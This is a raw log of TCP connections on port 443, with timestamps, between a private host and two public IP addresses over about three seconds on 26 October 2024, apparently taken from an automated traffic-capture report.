                                                                              Oct 26, 2024 08:49:44.863579988 CEST4434988813.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:44.866411924 CEST49889443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:44.866482973 CEST4434988913.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:44.866610050 CEST49889443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:44.870486021 CEST49889443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:44.870521069 CEST4434988913.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:44.898855925 CEST49890443192.168.2.4188.114.97.3
                                                                              Oct 26, 2024 08:49:44.898904085 CEST44349890188.114.97.3192.168.2.4
                                                                              Oct 26, 2024 08:49:44.899117947 CEST49890443192.168.2.4188.114.97.3
                                                                              Oct 26, 2024 08:49:44.901804924 CEST49890443192.168.2.4188.114.97.3
                                                                              Oct 26, 2024 08:49:44.901818991 CEST44349890188.114.97.3192.168.2.4
                                                                              Oct 26, 2024 08:49:44.965394020 CEST4434988213.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:44.965508938 CEST4434988213.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:44.965734959 CEST49882443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:44.965842962 CEST49882443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:44.965857029 CEST4434988213.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:44.965878963 CEST49882443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:44.965888977 CEST4434988213.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:44.981796026 CEST49891443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:44.981856108 CEST4434989113.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:44.981950045 CEST49891443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:44.993134975 CEST49891443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:44.993182898 CEST4434989113.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:45.460042000 CEST4434988713.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:45.460551977 CEST49887443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:45.460568905 CEST4434988713.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:45.461080074 CEST49887443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:45.461083889 CEST4434988713.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:45.473479986 CEST4434988613.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:45.476185083 CEST49886443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:45.476210117 CEST4434988613.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:45.476999044 CEST49886443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:45.477005005 CEST4434988613.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:45.533396959 CEST44349883188.114.97.3192.168.2.4
                                                                              Oct 26, 2024 08:49:45.533721924 CEST49883443192.168.2.4188.114.97.3
                                                                              Oct 26, 2024 08:49:45.533750057 CEST44349883188.114.97.3192.168.2.4
                                                                              Oct 26, 2024 08:49:45.534951925 CEST44349883188.114.97.3192.168.2.4
                                                                              Oct 26, 2024 08:49:45.535815954 CEST49883443192.168.2.4188.114.97.3
                                                                              Oct 26, 2024 08:49:45.536006927 CEST44349883188.114.97.3192.168.2.4
                                                                              Oct 26, 2024 08:49:45.536297083 CEST49883443192.168.2.4188.114.97.3
                                                                              Oct 26, 2024 08:49:45.561824083 CEST44349884188.114.97.3192.168.2.4
                                                                              Oct 26, 2024 08:49:45.562066078 CEST49884443192.168.2.4188.114.97.3
                                                                              Oct 26, 2024 08:49:45.562088966 CEST44349884188.114.97.3192.168.2.4
                                                                              Oct 26, 2024 08:49:45.563143969 CEST44349884188.114.97.3192.168.2.4
                                                                              Oct 26, 2024 08:49:45.563205957 CEST49884443192.168.2.4188.114.97.3
                                                                              Oct 26, 2024 08:49:45.563750029 CEST49884443192.168.2.4188.114.97.3
                                                                              Oct 26, 2024 08:49:45.563819885 CEST44349884188.114.97.3192.168.2.4
                                                                              Oct 26, 2024 08:49:45.564131021 CEST49884443192.168.2.4188.114.97.3
                                                                              Oct 26, 2024 08:49:45.564138889 CEST44349884188.114.97.3192.168.2.4
                                                                              Oct 26, 2024 08:49:45.571216106 CEST44349885188.114.97.3192.168.2.4
                                                                              Oct 26, 2024 08:49:45.571515083 CEST49885443192.168.2.4188.114.97.3
                                                                              Oct 26, 2024 08:49:45.571527958 CEST44349885188.114.97.3192.168.2.4
                                                                              Oct 26, 2024 08:49:45.571808100 CEST44349885188.114.97.3192.168.2.4
                                                                              Oct 26, 2024 08:49:45.572913885 CEST49885443192.168.2.4188.114.97.3
                                                                              Oct 26, 2024 08:49:45.572966099 CEST44349885188.114.97.3192.168.2.4
                                                                              Oct 26, 2024 08:49:45.573790073 CEST49885443192.168.2.4188.114.97.3
                                                                              Oct 26, 2024 08:49:45.583324909 CEST44349883188.114.97.3192.168.2.4
                                                                              Oct 26, 2024 08:49:45.586930990 CEST4434988913.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:45.589766026 CEST4434988713.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:45.589963913 CEST4434988713.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:45.589998960 CEST4434988713.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:45.590013027 CEST49887443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:45.590059042 CEST49887443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:45.591165066 CEST49889443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:45.591250896 CEST4434988913.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:45.592967987 CEST49889443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:45.592986107 CEST4434988913.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:45.593679905 CEST49887443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:45.593679905 CEST49887443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:45.593693972 CEST4434988713.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:45.593704939 CEST4434988713.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:45.593728065 CEST4434988813.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:45.596879959 CEST49888443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:45.596895933 CEST4434988813.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:45.603113890 CEST49888443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:45.603123903 CEST4434988813.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:45.607333899 CEST4434988613.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:45.607475996 CEST4434988613.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:45.607525110 CEST49886443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:45.608005047 CEST49886443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:45.608026028 CEST4434988613.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:45.608036041 CEST49886443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:45.608042955 CEST4434988613.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:45.612175941 CEST49892443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:45.612215996 CEST4434989213.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:45.612283945 CEST49892443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:45.612596035 CEST49892443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:45.612607956 CEST4434989213.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:45.614880085 CEST49884443192.168.2.4188.114.97.3
                                                                              Oct 26, 2024 08:49:45.619306087 CEST49893443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:45.619333029 CEST44349885188.114.97.3192.168.2.4
                                                                              Oct 26, 2024 08:49:45.619400024 CEST4434989313.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:45.619479895 CEST49893443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:45.619823933 CEST49893443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:45.619837046 CEST4434989313.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:45.715471983 CEST4434988913.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:45.715569019 CEST4434988913.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:45.715610027 CEST4434988913.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:45.715622902 CEST49889443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:45.715660095 CEST49889443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:45.717386007 CEST4434989113.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:45.721986055 CEST49889443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:45.722022057 CEST4434988913.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:45.729852915 CEST4434988813.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:45.730010986 CEST4434988813.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:45.730071068 CEST49888443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:45.730796099 CEST49891443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:45.730829000 CEST4434989113.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:45.732258081 CEST49891443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:45.732270002 CEST4434989113.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:45.736551046 CEST49894443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:45.736587048 CEST4434989413.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:45.736639977 CEST49894443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:45.736819983 CEST49888443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:45.736819983 CEST49888443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:45.736836910 CEST4434988813.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:45.736845970 CEST4434988813.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:45.737154007 CEST49894443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:45.737166882 CEST4434989413.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:45.746932983 CEST49895443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:45.746987104 CEST4434989513.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:45.747082949 CEST49895443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:45.747291088 CEST49895443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:45.747325897 CEST4434989513.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:45.774095058 CEST44349890188.114.97.3192.168.2.4
                                                                              Oct 26, 2024 08:49:45.778595924 CEST49890443192.168.2.4188.114.97.3
                                                                              Oct 26, 2024 08:49:45.778626919 CEST44349890188.114.97.3192.168.2.4
                                                                              Oct 26, 2024 08:49:45.779851913 CEST44349890188.114.97.3192.168.2.4
                                                                              Oct 26, 2024 08:49:45.779926062 CEST49890443192.168.2.4188.114.97.3
                                                                              Oct 26, 2024 08:49:45.782557011 CEST49890443192.168.2.4188.114.97.3
                                                                              Oct 26, 2024 08:49:45.782634020 CEST44349890188.114.97.3192.168.2.4
                                                                              Oct 26, 2024 08:49:45.782679081 CEST49890443192.168.2.4188.114.97.3
                                                                              Oct 26, 2024 08:49:45.782686949 CEST44349890188.114.97.3192.168.2.4
                                                                              Oct 26, 2024 08:49:45.782840014 CEST44349890188.114.97.3192.168.2.4
                                                                              Oct 26, 2024 08:49:45.782881021 CEST49890443192.168.2.4188.114.97.3
                                                                              Oct 26, 2024 08:49:45.783056021 CEST49890443192.168.2.4188.114.97.3
                                                                              Oct 26, 2024 08:49:45.783072948 CEST44349890188.114.97.3192.168.2.4
                                                                              Oct 26, 2024 08:49:45.783082008 CEST49890443192.168.2.4188.114.97.3
                                                                              Oct 26, 2024 08:49:45.783116102 CEST49890443192.168.2.4188.114.97.3
                                                                              Oct 26, 2024 08:49:45.783668995 CEST49896443192.168.2.4188.114.97.3
                                                                              Oct 26, 2024 08:49:45.783710957 CEST44349896188.114.97.3192.168.2.4
                                                                              Oct 26, 2024 08:49:45.783783913 CEST49896443192.168.2.4188.114.97.3
                                                                              Oct 26, 2024 08:49:45.784496069 CEST49896443192.168.2.4188.114.97.3
                                                                              Oct 26, 2024 08:49:45.784507990 CEST44349896188.114.97.3192.168.2.4
                                                                              Oct 26, 2024 08:49:45.856626987 CEST4434989113.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:45.856782913 CEST4434989113.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:45.856837034 CEST49891443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:45.857296944 CEST49891443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:45.857296944 CEST49891443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:45.857317924 CEST4434989113.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:45.857340097 CEST4434989113.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:45.869507074 CEST49897443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:45.869533062 CEST4434989713.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:45.869605064 CEST49897443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:45.870510101 CEST49897443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:45.870522976 CEST4434989713.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:45.989372015 CEST44349883188.114.97.3192.168.2.4
                                                                              Oct 26, 2024 08:49:45.989526033 CEST44349883188.114.97.3192.168.2.4
                                                                              Oct 26, 2024 08:49:45.991534948 CEST49883443192.168.2.4188.114.97.3
                                                                              Oct 26, 2024 08:49:45.993360996 CEST49898443192.168.2.4188.114.97.3
                                                                              Oct 26, 2024 08:49:45.993366957 CEST49883443192.168.2.4188.114.97.3
                                                                              Oct 26, 2024 08:49:45.993380070 CEST44349883188.114.97.3192.168.2.4
                                                                              Oct 26, 2024 08:49:45.993405104 CEST44349898188.114.97.3192.168.2.4
                                                                              Oct 26, 2024 08:49:45.993592978 CEST49898443192.168.2.4188.114.97.3
                                                                              Oct 26, 2024 08:49:45.994294882 CEST49898443192.168.2.4188.114.97.3
                                                                              Oct 26, 2024 08:49:45.994311094 CEST44349898188.114.97.3192.168.2.4
                                                                              Oct 26, 2024 08:49:46.037452936 CEST44349884188.114.97.3192.168.2.4
                                                                              Oct 26, 2024 08:49:46.037561893 CEST44349884188.114.97.3192.168.2.4
                                                                              Oct 26, 2024 08:49:46.038094997 CEST49884443192.168.2.4188.114.97.3
                                                                              Oct 26, 2024 08:49:46.038356066 CEST49884443192.168.2.4188.114.97.3
                                                                              Oct 26, 2024 08:49:46.038372040 CEST44349884188.114.97.3192.168.2.4
                                                                              Oct 26, 2024 08:49:46.046906948 CEST44349885188.114.97.3192.168.2.4
                                                                              Oct 26, 2024 08:49:46.046966076 CEST44349885188.114.97.3192.168.2.4
                                                                              Oct 26, 2024 08:49:46.047095060 CEST49885443192.168.2.4188.114.97.3
                                                                              Oct 26, 2024 08:49:46.049922943 CEST49885443192.168.2.4188.114.97.3
                                                                              Oct 26, 2024 08:49:46.049927950 CEST49899443192.168.2.4188.114.97.3
                                                                              Oct 26, 2024 08:49:46.049935102 CEST44349885188.114.97.3192.168.2.4
                                                                              Oct 26, 2024 08:49:46.049954891 CEST44349899188.114.97.3192.168.2.4
                                                                              Oct 26, 2024 08:49:46.050030947 CEST49899443192.168.2.4188.114.97.3
                                                                              Oct 26, 2024 08:49:46.050642967 CEST49899443192.168.2.4188.114.97.3
                                                                              Oct 26, 2024 08:49:46.050668001 CEST44349899188.114.97.3192.168.2.4
                                                                              Oct 26, 2024 08:49:46.370851040 CEST4434989313.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:46.371400118 CEST49893443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:46.371417046 CEST4434989313.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:46.372445107 CEST49893443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:46.372448921 CEST4434989313.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:46.373583078 CEST4434989213.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:46.374604940 CEST49892443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:46.374634027 CEST4434989213.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:46.390523911 CEST49892443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:46.390557051 CEST4434989213.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:46.470873117 CEST4434989513.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:46.488964081 CEST4434989413.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:46.501774073 CEST4434989313.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:46.501899004 CEST4434989313.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:46.502039909 CEST49893443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:46.516486883 CEST49895443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:46.520150900 CEST4434989213.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:46.520216942 CEST4434989213.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:46.523183107 CEST49892443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:46.534526110 CEST49894443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:46.551353931 CEST49895443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:46.551398039 CEST4434989513.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:46.551935911 CEST49895443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:46.551938057 CEST49892443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:46.551944971 CEST4434989513.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:46.551974058 CEST4434989213.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:46.551999092 CEST49892443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:46.552006006 CEST4434989213.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:46.553447962 CEST49894443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:46.553448915 CEST49894443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:46.553459883 CEST4434989413.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:46.553474903 CEST4434989413.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:46.553584099 CEST49893443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:46.553584099 CEST49893443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:46.553621054 CEST4434989313.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:46.553647041 CEST4434989313.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:46.556116104 CEST49900443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:46.556155920 CEST4434990013.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:46.556422949 CEST49900443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:46.556762934 CEST49900443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:46.556762934 CEST49901443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:46.556778908 CEST4434990013.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:46.556786060 CEST4434990113.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:46.556951046 CEST49901443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:46.556951046 CEST49901443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:46.556977034 CEST4434990113.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:46.618486881 CEST4434989713.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:46.654517889 CEST44349896188.114.97.3192.168.2.4
                                                                              Oct 26, 2024 08:49:46.666424990 CEST49897443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:46.677792072 CEST4434989513.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:46.677864075 CEST4434989513.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:46.677961111 CEST49895443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:46.683304071 CEST4434989413.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:46.683743954 CEST4434989413.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:46.683799982 CEST4434989413.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:46.686758041 CEST49894443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:46.710464954 CEST49896443192.168.2.4188.114.97.3
                                                                              Oct 26, 2024 08:49:46.869466066 CEST44349898188.114.97.3192.168.2.4
                                                                              Oct 26, 2024 08:49:46.878283024 CEST44349899188.114.97.3192.168.2.4
                                                                              Oct 26, 2024 08:49:46.902515888 CEST49897443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:46.902517080 CEST49897443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:46.902535915 CEST4434989713.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:46.902544022 CEST4434989713.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:46.902873993 CEST49896443192.168.2.4188.114.97.3
                                                                              Oct 26, 2024 08:49:46.902899981 CEST44349896188.114.97.3192.168.2.4
                                                                              Oct 26, 2024 08:49:46.902973890 CEST49898443192.168.2.4188.114.97.3
                                                                              Oct 26, 2024 08:49:46.902976036 CEST49899443192.168.2.4188.114.97.3
                                                                              Oct 26, 2024 08:49:46.902981997 CEST44349898188.114.97.3192.168.2.4
                                                                              Oct 26, 2024 08:49:46.902986050 CEST44349899188.114.97.3192.168.2.4
                                                                              Oct 26, 2024 08:49:46.903491020 CEST44349899188.114.97.3192.168.2.4
                                                                              Oct 26, 2024 08:49:46.903594971 CEST49895443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:46.903594971 CEST49895443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:46.903620958 CEST4434989513.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:46.903630972 CEST4434989513.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:46.903779030 CEST49894443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:46.903815031 CEST4434989413.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:46.903841972 CEST49894443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:46.903850079 CEST4434989413.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:46.904264927 CEST44349898188.114.97.3192.168.2.4
                                                                              Oct 26, 2024 08:49:46.904398918 CEST44349896188.114.97.3192.168.2.4
                                                                              Oct 26, 2024 08:49:46.904412985 CEST44349896188.114.97.3192.168.2.4
                                                                              Oct 26, 2024 08:49:46.904661894 CEST49896443192.168.2.4188.114.97.3
                                                                              Oct 26, 2024 08:49:46.906290054 CEST49899443192.168.2.4188.114.97.3
                                                                              Oct 26, 2024 08:49:46.906367064 CEST44349899188.114.97.3192.168.2.4
                                                                              Oct 26, 2024 08:49:46.906404018 CEST49898443192.168.2.4188.114.97.3
                                                                              Oct 26, 2024 08:49:46.906588078 CEST44349898188.114.97.3192.168.2.4
                                                                              Oct 26, 2024 08:49:46.907069921 CEST49896443192.168.2.4188.114.97.3
                                                                              Oct 26, 2024 08:49:46.907135010 CEST44349896188.114.97.3192.168.2.4
                                                                              Oct 26, 2024 08:49:46.907582998 CEST49899443192.168.2.4188.114.97.3
                                                                              Oct 26, 2024 08:49:46.907691002 CEST49898443192.168.2.4188.114.97.3
                                                                              Oct 26, 2024 08:49:46.907876968 CEST49896443192.168.2.4188.114.97.3
                                                                              Oct 26, 2024 08:49:46.907888889 CEST44349896188.114.97.3192.168.2.4
                                                                              Oct 26, 2024 08:49:46.909497976 CEST49902443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:46.909499884 CEST49903443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:46.909528971 CEST4434990313.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:46.909529924 CEST4434990213.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:46.909727097 CEST49903443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:46.909729958 CEST49902443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:46.910779953 CEST49903443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:46.910783052 CEST49902443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:46.910794020 CEST4434990313.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:46.910797119 CEST4434990213.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:46.951375008 CEST44349899188.114.97.3192.168.2.4
                                                                              Oct 26, 2024 08:49:46.951389074 CEST44349898188.114.97.3192.168.2.4
                                                                              Oct 26, 2024 08:49:46.958796978 CEST49896443192.168.2.4188.114.97.3
                                                                              Oct 26, 2024 08:49:47.031985998 CEST4434989713.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:47.032073021 CEST4434989713.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:47.032126904 CEST49897443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:47.032432079 CEST49897443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:47.032452106 CEST4434989713.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:47.032461882 CEST49897443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:47.032468081 CEST4434989713.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:47.035659075 CEST49904443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:47.035681963 CEST4434990413.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:47.035752058 CEST49904443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:47.036005020 CEST49904443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:47.036019087 CEST4434990413.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:47.284651041 CEST4434990013.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:47.285243988 CEST49900443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:47.285286903 CEST4434990013.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:47.285734892 CEST49900443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:47.285748005 CEST4434990013.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:47.288995981 CEST4434990113.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:47.289601088 CEST49901443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:47.289618969 CEST4434990113.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:47.290247917 CEST49901443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:47.290252924 CEST4434990113.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:47.373569965 CEST44349899188.114.97.3192.168.2.4
                                                                              Oct 26, 2024 08:49:47.373692989 CEST44349899188.114.97.3192.168.2.4
                                                                              Oct 26, 2024 08:49:47.373734951 CEST49899443192.168.2.4188.114.97.3
                                                                              Oct 26, 2024 08:49:47.376586914 CEST49899443192.168.2.4188.114.97.3
                                                                              Oct 26, 2024 08:49:47.376599073 CEST44349899188.114.97.3192.168.2.4
                                                                              Oct 26, 2024 08:49:47.397479057 CEST44349896188.114.97.3192.168.2.4
                                                                              Oct 26, 2024 08:49:47.397569895 CEST44349896188.114.97.3192.168.2.4
                                                                              Oct 26, 2024 08:49:47.397631884 CEST49896443192.168.2.4188.114.97.3
                                                                              Oct 26, 2024 08:49:47.413918018 CEST4434990013.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:47.413966894 CEST4434990013.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:47.414019108 CEST4434990013.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:47.414036036 CEST49900443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:47.414083958 CEST49900443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:47.420526028 CEST4434990113.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:47.420595884 CEST4434990113.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:47.420659065 CEST49901443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:47.420798063 CEST49900443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:47.420798063 CEST49900443192.168.2.413.107.246.45
                                                                              Oct 26, 2024 08:49:47.420820951 CEST4434990013.107.246.45192.168.2.4
                                                                              Oct 26, 2024 08:49:47.420830965 CEST4434990013.107.246.45192.168.2.4
